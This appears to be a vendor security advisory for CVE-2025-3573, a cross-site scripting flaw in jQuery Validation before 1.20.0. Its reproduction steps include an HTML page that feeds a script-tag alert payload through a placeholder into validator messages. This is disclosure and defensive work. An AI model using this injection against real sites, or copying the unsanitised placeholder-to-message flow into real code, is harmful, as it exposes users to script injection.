By clicking "Accept", you agree to the storing of cookies on your device to enhance site navigation, analyze site usage, and assist in our marketing efforts. View our Privacy Policy for more information.

PreferencesRejectAccept
Manage Consent Preferences by Category
Essentials
Always active

Necessary for the site to function. Always On.

Used for targeted advertising.

Remembers your preferences and provides enhanced features.

Measures usage and improves your experience.

Reject AllAccept All
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.
View all Vulnerabilities

CVE-2025-3573

Cross-Site Scripting
Affects
jQuery Validation
in
jQuery
No items found.
Versions
<1.20.0
Exclamation circle icon
Patch Available

This Vulnerability has been fixed in the Never-Ending Support (NES) version offered by HeroDevs.

View NES Solution

Overview

jQuery Validation is a JavaScript library that simplifies form validation by providing customizable rules and messages to ensure user input meets specified criteria on web pages.

A medium-severity Cross-Site Scripting (XSS) vulnerability (CVE-2025-3573) has been identified in jQuery Validation. The vulnerability resides in the showLabel()     function, which fails to properly sanitize user-controlled input used in a placeholder value. This allows attackers to inject malicious scripts that can execute in the context of a user's browser.

A Cross-site Scripting (XSS) vulnerability is a type of security flaw that allows attackers to inject malicious scripts into webpages. It often occurs when a site fails to properly validate or sanitize user input, enabling the execution of unauthorized code within a victim's browser. It is included in the OWASP Top Ten list of vulnerabilities, specifically in the third category of Injection. A web site compromised in this way may experience:

  • Session hijacking
  • Data theft
  • Malware distribution
  • Defacement or phishing and
  • Privilege escalation.

This issue affects jQuery Validation versions lower than 1.20.0.

Details

Module Info

Vulnerability Info

A cross-site scripting (XSS) issue exists in showLabel() where user-controlled placeholder text can flow into $.validator.messages (a localizable message dictionary) and be rendered without sanitization, allowing injected script to execute in the user’s browser. This medium-severity vulnerability is found in jQuery Validation in versions lower than 1.20.0.

Steps To Reproduce

1. Set up a vulnerable environment by performing the following:

  • Download jQuery 3.6.0 from https://code.jquery.com or a CDN and place it in a local /js folder.
  • Download a vulnerable version of the jQuery Validation package <1.20.0, such as version 1.19.5, from https://jqueryvalidation.org and place it in a local /js folder.

2. Create an HTML page containing a form similar to the following:

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>CVE-2025-3573 Demo</title>
</head>
<body>
  <h1>jQuery Validation XSS Test</h1>
  <form id="myForm">
    <label for="username">Username:</label>
    <input type="text" name="username" id="username" required placeholder="">
    <br>
    <button type="submit">Submit</button>
  </form>

  <script src="js/jquery-3.6.0.min.js"></script>
  <script src="js/jquery.validate-1.19.5.min.js"></script>
  <script>
    // Simulate user-controlled input that ends up in a placeholder value
    // (e.g., injected from a query parameter or database)
    var userControlledInput = '<script>alert("XSS!");</script>';

    // User-controlled placeholder value (the advisory describes placeholder text flowing to messages)
    document.getElementById("username").setAttribute("placeholder", userControlledInput);

    // Configure the form with jQuery Validation
    // Vulnerable flow: showLabel() uses a message sourced from placeholder text
    var placeholderText = document.getElementById("username").getAttribute("placeholder");
    $.validator.messages.required = placeholderText;

    $("#myForm").validate({
      rules: {
        username: { required: true }
      },
      messages: {
        username: {
          required: $.validator.messages.required
        }
      }
    });
  </script>
</body>
</html>

3. Start a local server and pull up the HTML page.

4. Leave the username field empty and click Submit:

  • jQuery Validation will trigger validation and the showLabel() function will attempt to display the error message defined in messages.username.required.
  • Since the message contains <script>alert("XSS!");</script>, the browser will execute the script, and you should see an alert box with “XSS!”.

Mitigation

Users of the affected component should apply one of the following mitigations:

  • If user input is used for a placeholder value, be sure to sanitize it.
  • Migrate affected applications away from jquery-validation.
  • Sign up for security support; HeroDevs customers get immediate access to a patched version of this module.

Sign up for security support; HeroDevs customers get immediate access to a patched version of this module.

Credits

Additional Resources

Drupal Security Advisory:
https://www.d7security.org/security-advisories/D7SECURITY-SA-CONTRIB-2025-001/

Pink arrow
Pink arrow
CVE-2015-9251
CVE-2019-11358
CVE-2020-11022
CVE-2020-11023
CVE-2020-7656
CVE-2021-41182
CVE-2010-5312
CVE-2021-41184
CVE-2021-41183
CVE-2025-3573
What is a HeroDevs Security Advisory?
Vulnerability Details
Severity
Level
CVSS Assessment
Low
>=0 <4
Medium
>=4 <6
High
>=6 <8
Critical
>=8 <10
Medium
ID
CVE-2025-3573
PROJECT Affected
jQuery Validation
Versions Affected
<1.20.0
NES Versions Affected
Published date
January 30, 2026
≈ Fix date
April 21, 2025
Fixed in
NES for jQuery
Category
Cross-Site Scripting
Sign up for the latest vulnerability alerts fixed in
NES for jQuery
Rss feed icon
Subscribe via RSS
or

By clicking “submit” I acknowledge receipt of our Privacy Policy.

Thanks for signing up for our Newsletter! We look forward to connecting with you.
Oops! Something went wrong while submitting the form.